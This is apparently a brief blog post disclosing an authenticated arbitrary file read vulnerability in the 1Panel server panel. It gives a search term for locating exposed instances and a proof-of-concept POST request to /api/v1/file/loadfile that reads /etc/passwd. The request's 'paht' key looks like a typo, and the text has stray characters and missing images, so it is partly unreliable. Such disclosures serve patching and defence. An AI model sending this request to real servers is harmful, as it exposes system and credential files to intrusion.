Post

1panel Loadfile Background File Reading Vulnerability

1panel Loadfile Background File Reading Vulnerability

1Panel loadfile background file reading vulnerability

Vulnerability Description

1There is arbitrary file reading vulnerability in the Panel background. The attacker can obtain sensitive information files in the server through the vulnerability.

Vulnerability Impact

1Panel

Network surveying and mapping

“1Panel”

Vulnerability reappears

Login page

img

img

img

Verify POC

1
2
3
POST /api/v1/file/loadfile

{"paht":"/etc/passwd"}

img

This post is licensed under CC BY 4.0 by the author.